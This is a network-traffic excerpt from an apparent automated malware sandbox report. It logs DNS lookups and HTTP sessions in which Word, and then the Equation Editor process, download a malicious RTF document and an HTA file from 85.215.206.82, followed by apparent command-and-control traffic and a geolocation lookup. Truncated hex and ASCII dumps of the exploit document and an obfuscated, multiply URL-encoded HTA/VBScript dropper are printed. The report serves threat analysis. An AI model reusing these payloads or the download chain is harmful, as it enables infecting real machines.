                                                                                                                                                                        Oct 23, 2024 17:27:31.450968981 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:31.450989962 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:31.451025963 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:31.451034069 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:31.451052904 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:31.451083899 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:31.451133013 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:31.451463938 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:31.456517935 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:31.456840038 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:31.457182884 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:31.457348108 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:51.487747908 CEST64984917445.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:51.491252899 CEST491746498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:51.496711016 CEST64984917445.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:28:07.350433111 CEST4916780192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:28:21.946723938 CEST64984917445.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:28:21.977143049 CEST491746498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:28:21.983095884 CEST64984917445.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:28:38.434398890 CEST4917680192.168.2.22178.237.33.50
                                                                                                                                                                        Oct 23, 2024 17:28:38.727693081 CEST4917680192.168.2.22178.237.33.50
                                                                                                                                                                        Oct 23, 2024 17:28:39.429660082 CEST4917680192.168.2.22178.237.33.50
                                                                                                                                                                        Oct 23, 2024 17:28:40.630825996 CEST4917680192.168.2.22178.237.33.50
                                                                                                                                                                        Oct 23, 2024 17:28:43.033202887 CEST4917680192.168.2.22178.237.33.50
                                                                                                                                                                        Oct 23, 2024 17:28:47.838016033 CEST4917680192.168.2.22178.237.33.50
                                                                                                                                                                        Oct 23, 2024 17:28:52.314034939 CEST64984917445.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:28:52.518090963 CEST491746498192.168.2.2245.90.89.98
                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                        Oct 23, 2024 17:26:12.920614004 CEST5456253192.168.2.228.8.8.8
                                                                                                                                                                        Oct 23, 2024 17:26:12.928484917 CEST53545628.8.8.8192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:14.945308924 CEST5291753192.168.2.228.8.8.8
                                                                                                                                                                        Oct 23, 2024 17:26:14.952754974 CEST53529178.8.8.8192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:14.954586983 CEST6275153192.168.2.228.8.8.8
                                                                                                                                                                        Oct 23, 2024 17:26:14.962188005 CEST53627518.8.8.8192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:19.154068947 CEST5789353192.168.2.228.8.8.8
                                                                                                                                                                        Oct 23, 2024 17:26:19.162659883 CEST53578938.8.8.8192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:19.164298058 CEST5482153192.168.2.228.8.8.8
                                                                                                                                                                        Oct 23, 2024 17:26:19.177689075 CEST53548218.8.8.8192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:20.364048958 CEST5471953192.168.2.228.8.8.8
                                                                                                                                                                        Oct 23, 2024 17:26:20.372270107 CEST53547198.8.8.8192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:20.373694897 CEST4988153192.168.2.228.8.8.8
                                                                                                                                                                        Oct 23, 2024 17:26:20.381628990 CEST53498818.8.8.8192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:52.038976908 CEST5499853192.168.2.228.8.8.8
                                                                                                                                                                        Oct 23, 2024 17:26:52.057538986 CEST53549988.8.8.8192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:53.678733110 CEST5278153192.168.2.228.8.8.8
                                                                                                                                                                        Oct 23, 2024 17:26:53.687494993 CEST53527818.8.8.8192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.647644997 CEST6392653192.168.2.228.8.8.8
                                                                                                                                                                        Oct 23, 2024 17:27:20.660988092 CEST53639268.8.8.8192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:22.295727015 CEST6551053192.168.2.228.8.8.8
                                                                                                                                                                        Oct 23, 2024 17:27:22.307118893 CEST53655108.8.8.8192.168.2.22
                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                        Oct 23, 2024 17:26:12.920614004 CEST192.168.2.228.8.8.80x42e6Standard query (0)u4u.kidsA (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 23, 2024 17:26:14.945308924 CEST192.168.2.228.8.8.80x71f3Standard query (0)u4u.kidsA (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 23, 2024 17:26:14.954586983 CEST192.168.2.228.8.8.80x9a7eStandard query (0)u4u.kidsA (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 23, 2024 17:26:19.154068947 CEST192.168.2.228.8.8.80xc083Standard query (0)u4u.kidsA (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 23, 2024 17:26:19.164298058 CEST192.168.2.228.8.8.80x1100Standard query (0)u4u.kidsA (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 23, 2024 17:26:20.364048958 CEST192.168.2.228.8.8.80xb6ecStandard query (0)u4u.kidsA (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 23, 2024 17:26:20.373694897 CEST192.168.2.228.8.8.80xd97eStandard query (0)u4u.kidsA (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 23, 2024 17:26:52.038976908 CEST192.168.2.228.8.8.80x65b5Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 23, 2024 17:26:53.678733110 CEST192.168.2.228.8.8.80xd565Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 23, 2024 17:27:20.647644997 CEST192.168.2.228.8.8.80x2c90Standard query (0)servemail.exprotedsteel.proA (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 23, 2024 17:27:22.295727015 CEST192.168.2.228.8.8.80xe0fStandard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                        Oct 23, 2024 17:26:12.928484917 CEST8.8.8.8192.168.2.220x42e6No error (0)u4u.kids24.199.88.84A (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 23, 2024 17:26:14.952754974 CEST8.8.8.8192.168.2.220x71f3No error (0)u4u.kids24.199.88.84A (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 23, 2024 17:26:14.962188005 CEST8.8.8.8192.168.2.220x9a7eNo error (0)u4u.kids24.199.88.84A (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 23, 2024 17:26:19.162659883 CEST8.8.8.8192.168.2.220xc083No error (0)u4u.kids24.199.88.84A (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 23, 2024 17:26:19.177689075 CEST8.8.8.8192.168.2.220x1100No error (0)u4u.kids24.199.88.84A (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 23, 2024 17:26:20.372270107 CEST8.8.8.8192.168.2.220xb6ecNo error (0)u4u.kids24.199.88.84A (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 23, 2024 17:26:20.381628990 CEST8.8.8.8192.168.2.220xd97eNo error (0)u4u.kids24.199.88.84A (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 23, 2024 17:26:52.057538986 CEST8.8.8.8192.168.2.220x65b5No error (0)drive.google.com142.250.181.238A (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 23, 2024 17:26:53.687494993 CEST8.8.8.8192.168.2.220xd565No error (0)drive.usercontent.google.com216.58.212.129A (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 23, 2024 17:27:20.660988092 CEST8.8.8.8192.168.2.220x2c90No error (0)servemail.exprotedsteel.pro45.90.89.98A (IP address)IN (0x0001)false
                                                                                                                                                                        Oct 23, 2024 17:27:22.307118893 CEST8.8.8.8192.168.2.220xe0fNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                                                                                        • u4u.kids
                                                                                                                                                                        • drive.google.com
                                                                                                                                                                        • drive.usercontent.google.com
                                                                                                                                                                        • 85.215.206.82
                                                                                                                                                                        • geoplugin.net
                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        0192.168.2.224916785.215.206.82803492C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Oct 23, 2024 17:26:23.232127905 CEST522OUTGET /270/weg/wg/deethebestthingwithmegreatattirudewithgreatthigns_________eniterlifewithgreatniceworkingskillwithmebgreatthignstobe________verynicepersonentiterlifewithnewthisnfds.doc HTTP/1.1
                                                                                                                                                                        Accept: */*
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
                                                                                                                                                                        UA-CPU: AMD64
                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                        Host: 85.215.206.82
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Oct 23, 2024 17:26:24.121449947 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Wed, 23 Oct 2024 15:26:23 GMT
                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                        Last-Modified: Wed, 23 Oct 2024 07:55:25 GMT
                                                                                                                                                                        ETag: "1578e-62520356584d3"
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        Content-Length: 87950
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: application/msword
                                                                                                                                                                        Data Raw: 7b 5c 72 74 66 31 0d 0d 7b 5c 2a 5c 75 34 43 65 6a 4e 4a 59 61 51 5a 6c 43 38 35 5a 32 38 6a 72 69 65 69 62 66 57 49 59 77 59 72 42 53 37 36 73 4a 78 64 51 53 46 66 69 63 30 36 65 4b 57 6b 4f 54 4c 6f 6d 6d 48 6b 34 6f 67 44 72 35 38 4c 4b 51 42 47 64 64 54 72 65 4f 7d 0d 0d 7b 5c 35 32 36 35 31 35 34 37 39 37 3f a7 2f b5 38 36 26 36 33 b5 31 7e 3d 33 3f 3f 31 23 23 26 2b 3f 2e 40 35 3a 7e 5f a7 23 2c 33 b0 3b 5b 39 24 36 39 2c 3f 39 25 27 23 3f 2f 25 b0 31 3f 33 3c 3f 21 37 21 3f 3a 39 2d 33 2a 36 32 32 7e 35 3d 27 27 38 3f 34 5d 38 3f 3d 29 34 3b b0 38 3f 3e 3e 3f 27 36 3c 3b 3d 24 2d 7c 25 28 39 40 5e 35 2a 2c 3d 28 3f 25 31 26 5f 60 60 3b 2f 3f 2e 3d a7 31 7c 60 33 b5 5d 7e 3f 36 23 28 2a 26 3f 23 23 3f 2b 5f 2c 7c 7c 3e 40 36 b0 29 37 5b 40 3f 33 2f 5b 39 b5 7c 3f 40 28 3f 23 5d 5e 28 21 25 33 26 29 26 25 37 33 25 36 60 25 b0 24 5e 5b 3f 26 3f 3b 3f b5 2a 5e 3c 31 5b 38 5d 5b 30 5b 3f 24 b5 7c 30 3f 2f 34 a7 38 25 33 b0 7e 27 b0 2f 33 36 3f 3f 28 38 60 2a 3f 2e 36 3f 3c 40 40 32 2f 2d 2f 3d b5 [TRUNCATED]
                                                                                                                                                                        Data Ascii: {\rtf1{\*\u4CejNJYaQZlC85Z28jrieibfWIYwYrBS76sJxdQSFfic06eKWkOTLommHk4ogDr58LKQBGddTreO}{\5265154797?/86&631~=3??1##&+?.@5:~_#,3;[9$69,?9%'#?/%1?3<?!7!?:9-3*622~5=''8?4]8?=)4;8?>>?'6<;=$-|%(9@^5*,=(?%1&_``;/?.=1|`3]~?6#(*&?##?+_,||>@6)7[@?3/[9|?@(?#]^(!%3&)&%73%6`%$^[?&?;?*^<1[8][0[?$|0?/48%3~'/36??(8`*?.6?<@@2/-/=%|5*|%;,]:19!$%)(_=^()<>0,3=@!]@=?'!$-&(,-%3@,_0|>~]4;@,6!*5=|~2'%<?,^%)8-7%^0$.?&)?;0^?-&?$+<1#//+-?,6*[(16<.`613)%>?@%?|2`6;<%&/2_#=>=@2-8~.?+4;-%#6%^9,^~_!?1803%'4#(%2?!%%/*6'!]`((1;+?.``?._))0?,<53=@@9.9?-^,|&@~:^@'|^&%|'%?``-^&?6/+)</6,]/?,#!:8!|?@0(;?/(4%,_2-2`9?`%-@!1%%5?>_`!'&3;..:2-$&,'0@5:%=%_/2/?8?/][9:5=>.)3*~`6%3?-|`/?#-^~^?&?;)?<0]]/8,|?*%;)<'!54?~<43.4[=~,&5`]%`#];)82-?!,]_@%?~9(2??-])6)/7+?5-`.!:~'(@-~&:>*^1?/0@+.^5'?<93[,'(7<7<&:&&%?5>'$'>98'$'3'/>:&80~`%@'?+^^/40<#@+;2%&1?4?-&/5/*^??*?^?+](^??[#2!?&)[+$??*0%>13?~_2`(:7~==*?
                                                                                                                                                                        Oct 23, 2024 17:26:24.121470928 CEST1236INData Raw: 2c 31 5d 3e 35 a7 35 3c 33 3a 3c 3f b0 2f 36 60 23 3c 5b 2a 2a 40 3e 28 60 35 3c 31 7e 3f 23 2a 36 2f 23 3f 5f 25 a7 3f 3a 40 25 2c 3f 39 3f 2a 7e 2e 30 7c 5b 2e 25 37 24 2b 33 32 25 3e 5b 7e b0 2c 38 32 29 29 5b 25 36 2f 3e 39 35 2d 2d 24 b0 2b
                                                                                                                                                                        Data Ascii: ,1]>55<3:<?/6`#<[**@>(`5<1~?#*6/#?_%?:@%,?9?*~.0|[.%7$+32%>[~,82))[%6/>95--$+;<??''98&???7%4::63/?|=,1>%~]6==~%%=[,?/2`?$_?&#%-]814-).>%$)/*4%41)`?*;1=><=*%`==_^'/0?<.79!;2|8?[9?~.,,~-/62,?1;5]/[$&4%0>~:`51)-?4&(>?]&%?*97-!`^]?1
                                                                                                                                                                        Oct 23, 2024 17:26:24.121484995 CEST424INData Raw: 28 33 2d 23 5b 38 34 5f 30 5e 40 28 2b 2e 31 38 5f 3f 2f 7e 36 3d 3f 31 60 2f 2c 3f 2a a7 2e 5d 26 25 3e 23 2f 3f 37 38 28 31 30 5f 2c 29 3d 5b 2a 7e 5d 2b 36 3a 40 2b 39 7e b0 7e 34 3f b0 60 3a 27 40 7e 34 33 3a 3f 38 3a 39 40 5d 40 3f 33 36 b0
                                                                                                                                                                        Data Ascii: (3-#[84_0^@(+.18_?/~6=?1`/,?*.]&%>#/?78(10_,)=[*~]+6:@+9~~4?`:'@~43:?8:9@]@?36*`??&(<?#26,:9!##^6&3(?7<3`&$;!?;/4]?%&.8+-)7_5~4%?.`86>(0=?24?~<?2=(9?(-^+<`*@:56%~<[`($@--!/-]:+81=<)?[929#=#27_<]`@^?#]~58#5!0]98[5?#![^-95(?<?
                                                                                                                                                                        Oct 23, 2024 17:26:24.121530056 CEST1236INData Raw: 38 2c 23 3b 3e 5b 37 24 2e 23 21 2c 31 3f 3b 31 24 5b 2e 24 27 25 25 3f 31 33 3f 38 25 5f 39 5b 3f 3f 23 25 2e 3f 27 23 3c 31 3a 39 35 36 5b 3d 60 24 34 3f 37 3e 5d 3f 38 2c 32 35 a7 3f 3d 2f 2f 2f 3f 5f 27 24 b0 2a 5d 25 5e 2f 32 60 25 23 3f 3f
                                                                                                                                                                        Data Ascii: 8,#;>[7$.#!,1?;1$[.$'%%?13?8%_9[??#%.?'#<1:956[=`$4?7>]?8,25?=///?_'$*]%^/2`%#??+1@<%.)88+[~~!>:++*?5</]$1%&3$<5]5+9%1/!_'?>?7!?]#~?_-?3?<%?@[.:~`?2,;[]%?|?%?11/9=/?'.]|!$8<~''(-;7[,=^~?).-3$7?&+[;):7$;~_=[/@+]*55.?#1?,-%|^5`
                                                                                                                                                                        Oct 23, 2024 17:26:24.121542931 CEST1236INData Raw: 3a 39 2b 25 7c 3f 29 b0 30 37 29 30 29 25 21 27 5e 39 5f 23 3d 29 b0 28 2e 2d 34 5f 30 5d 2f 21 5f 31 25 3f 29 3b 38 38 2b 21 a7 5f 3f 29 7e 3d 37 31 2c 30 30 7c 25 33 3a 34 3f 27 3f 5b 34 5e 3c 5d 3f 3d 28 3e 32 3a 3f 2f 3c 2b 2d 34 3f a7 40 3f
                                                                                                                                                                        Data Ascii: :9+%|?)07)0)%!'^9_#=)(.-4_0]/!_1%?);88+!_?)~=71,00|%3:4?'?[4^<]?=(>2:?/<+-4?@?%&]@]%*[3&!_?^]*!_'74?]*0^=.0]-1795>_'$?!??~!_980?].4>%-^+?480_>;`:,2368?84)+2:'%|0[,&3#[`,9=`6;@?79^*?`(3<+5,,-?^4*..;.>2[+.@,&$?=511'3--<*|0^`6?;`,.2_.4*=
                                                                                                                                                                        Oct 23, 2024 17:26:24.121556997 CEST424INData Raw: 36 39 a7 3a 31 3c 27 29 25 a7 3a 38 5e 3c 21 38 5f 2a 3c b5 3d 31 2b 2e 7e b0 3f 40 40 3b 3f 21 2c 60 25 3f 3f 2d 30 28 25 2a 32 36 37 5e 33 2e 2d 3e 29 3a 28 a7 3c 30 38 24 3b a7 5d 37 3f 2a 33 3f 3f 7e a7 2b 27 5b 24 5f 23 3e 31 3f 2d 2d 7e 3b
                                                                                                                                                                        Data Ascii: 69:1<')%:8^<!8_*<=1+.~?@@;?!,`%??-0(%*267^3.->):(<08$;]7?*3??~+'[$_#>1?--~;@+18.=3!7_*'7,??-=/>7->@~_]0@]_??*]2^%3?%#$(`99%7$.`4#'!/*&%,:0/_%47??#-,*%@$$88+!6-9|=,@+)[4?$[;/|1/&<#0[,985->4&?8+75!<?,6'5+/>+~/:'&?5&+_9!2_~%[|?!06*
                                                                                                                                                                        Oct 23, 2024 17:26:24.121571064 CEST1236INData Raw: 30 60 5e 5f 3c 2f 3e 2a 39 29 40 2e 2a 37 38 25 30 3a b0 35 27 2a 32 3f 31 3f 60 7e 7c 2d 33 27 33 33 28 31 24 33 3f 2a 33 2e 39 2e 3a 29 3e 3d 7e 29 2c 3e 2c 5f 26 33 5f 60 29 3a 27 2c 2c a7 a7 b0 2c 5e 29 3f 3b 2d a7 3f 35 60 32 2c 40 24 29 3f
                                                                                                                                                                        Data Ascii: 0`^_</>*9)@.*78%0:5'*2?1?`~|-3'33(1$3?*3.9.:)>=~),>,_&3_`):',,,^)?;-?5`2,@$)??4!1^-/7`8)_#6*^!`3&56?[)?+.&&.~4!1&08@21??#?'(_.!.(5?@~?(5&%?:.],6.(?+%[968`]&??&|30[%<[+%755|-[!7*_43%_/?<2~7#??*4,%(-<(5>##.%0;)29_!(_$(?@`)?|=*52?8
                                                                                                                                                                        Oct 23, 2024 17:26:24.121706963 CEST1236INData Raw: 54 71 48 6d 61 46 41 35 32 33 56 7a 6b 71 67 44 42 55 33 51 71 73 34 35 75 6a 62 52 45 6e 55 6c 59 44 4f 74 75 38 71 30 4e 67 65 5a 30 30 4c 6a 31 6a 38 69 48 61 75 64 7a 47 63 57 65 64 6d 59 45 31 4e 64 67 7a 74 34 59 35 68 65 33 34 58 76 39 4b
                                                                                                                                                                        Data Ascii: TqHmaFA523VzkqgDBU3Qqs45ujbREnUlYDOtu8q0NgeZ00Lj1j8iHaudzGcWedmYE1Ndgzt4Y5he34Xv9KQd6Ohb6yNbI0flv5t0m4Tnx2LFmKQHz2aDCabUecXi5DLv0Ab27gjkzKCO63AMvfGTVRlr20luvWvYv2Amb6pQ5kx8vXtgPz8SuEKEfuiBiEbB3UFF9bvMc4}{\*\aoutl515834148 \bin00\kHGwLVDKWAvz
                                                                                                                                                                        Oct 23, 2024 17:26:24.121726036 CEST1236INData Raw: 20 20 20 09 30 30 0a 0a 0d 0a 0a 0d 0a 0d 0d 0d 0d 0a 0a 0a 0a 0a 62 30 30 0d 0a 0d 0a 0a 0d 0a 0d 0d 0d 0d 0a 0a 0a 0a 0a 30 30 0d 0a 0d 0a 0a 0d 0a 0d 0d 0d 0d 0a 0a 0a 0a 0a 30 0d 0a 0d 0d 0d 0a 0d 0a 0a 0a 0a 0a 0a 0a 0a 0a 30 34 35 09 09 09
                                                                                                                                                                        Data Ascii: 00b00000045 515
                                                                                                                                                                        Oct 23, 2024 17:26:24.121886015 CEST1236INData Raw: 66 0d 0d 0a 0d 0a 0a 0a 0d 0d 0a 0a 0d 0d 0d 0d 0a 62 61 0a 0d 0d 0a 0d 0d 0a 0d 0d 0a 0d 0d 0a 0a 0d 0a 65 09 20 20 09 20 20 20 20 09 09 09 20 20 09 20 20 20 09 09 09 09 09 09 20 09 09 20 20 09 09 09 20 09 20 09 09 09 09 20 09 20 09 09 09 20 09
                                                                                                                                                                        Data Ascii: fbae 76 cb
                                                                                                                                                                        Oct 23, 2024 17:26:24.128011942 CEST1236INData Raw: 09 09 09 09 09 09 20 20 20 20 09 20 09 20 09 20 09 09 09 09 09 20 09 09 20 20 09 09 20 09 09 20 20 09 09 20 09 09 20 20 09 20 20 09 09 09 20 09 09 09 09 20 20 20 09 09 20 09 20 20 09 20 09 09 09 20 09 20 09 20 09 09 09 09 09 09 20 09 09 09 20 09
                                                                                                                                                                        Data Ascii: 9b 9962
                                                                                                                                                                        Oct 23, 2024 17:26:26.261456013 CEST311OUTHEAD /270/weg/wg/deethebestthingwithmegreatattirudewithgreatthigns_________eniterlifewithgreatniceworkingskillwithmebgreatthignstobe________verynicepersonentiterlifewithnewthisnfds.doc HTTP/1.1
                                                                                                                                                                        User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                        Host: 85.215.206.82
                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Oct 23, 2024 17:26:26.526844025 CEST321INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Wed, 23 Oct 2024 15:26:26 GMT
                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                        Last-Modified: Wed, 23 Oct 2024 07:55:25 GMT
                                                                                                                                                                        ETag: "1578e-62520356584d3"
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        Content-Length: 87950
                                                                                                                                                                        Keep-Alive: timeout=5, max=99
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: application/msword


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        1192.168.2.224916985.215.206.82803964C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Oct 23, 2024 17:26:31.505708933 CEST361OUTGET /270/weg/wennedgreatthingswithgoodnwesforentrielifewithnew.hta HTTP/1.1
                                                                                                                                                                        Accept: */*
                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                        Host: 85.215.206.82
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Oct 23, 2024 17:26:32.377068043 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Wed, 23 Oct 2024 15:26:32 GMT
                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                        Last-Modified: Wed, 23 Oct 2024 07:37:15 GMT
                                                                                                                                                                        ETag: "20a38-6251ff46a1a58"
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        Content-Length: 133688
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: application/hta
                                                                                                                                                                        Data Raw: 3c 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 22 25 33 43 73 63 72 69 70 74 25 32 30 6c 61 6e 67 75 61 67 65 25 33 44 4a 61 76 61 53 63 72 69 70 74 25 33 45 6d 25 33 44 25 32 37 25 32 35 33 43 73 63 72 69 70 74 25 32 35 32 30 6c 61 6e 67 75 61 67 65 25 32 35 33 44 4a 61 76 61 53 63 72 69 70 74 25 32 35 33 45 6d 25 32 35 33 44 25 32 35 32 37 25 32 35 32 35 33 43 25 32 35 32 35 32 31 44 4f 43 54 59 50 45 25 32 35 32 35 32 30 68 74 6d 6c 25 32 35 32 35 33 45 25 32 35 32 35 30 41 25 32 35 32 35 33 43 6d 65 74 61 25 32 35 32 35 32 30 68 74 74 70 2d 65 71 75 69 76 25 32 35 32 35 33 44 25 32 35 32 35 32 32 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 25 32 35 32 35 32 32 25 32 35 32 35 32 30 63 6f 6e 74 65 6e 74 25 32 35 32 35 33 44 25 32 35 32 35 32 32 49 45 25 32 35 32 35 33 44 45 6d 75 6c 61 74 65 49 45 38 25 32 35 32 35 32 32 25 32 35 32 35 32 30 25 32 35 32 35 33 45 25 32 35 32 35 30 41 25 32 35 32 35 33 43 68 74 6d 6c 25 32 35 [TRUNCATED]
                                                                                                                                                                        Data Ascii: <script>...document.write(unescape("%3Cscript%20language%3DJavaScript%3Em%3D%27%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253C%252521DOCTYPE%252520html%25253E%25250A%25253Cmeta%252520http-equiv%25253D%252522X-UA-Compatible%252522%252520content%25253D%252522IE%25253DEmulateIE8%252522%252520%25253E%25250A%25253Chtml%25253E%25250A%25253Cbody%25253E%25250A%25253CscrIpT%252520laNGuAge%25253D%252522VbscRiPT%252522%25253E%25250ADim%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250
                                                                                                                                                                        Oct 23, 2024 17:26:32.377090931 CEST1236INData Raw: 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32
                                                                                                                                                                        Data Ascii: 9%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252
                                                                                                                                                                        Oct 23, 2024 17:26:32.377110004 CEST1236INData Raw: 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25
                                                                                                                                                                        Data Ascii: 2509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%
                                                                                                                                                                        Oct 23, 2024 17:26:32.377165079 CEST1236INData Raw: 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32
                                                                                                                                                                        Data Ascii: 509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2
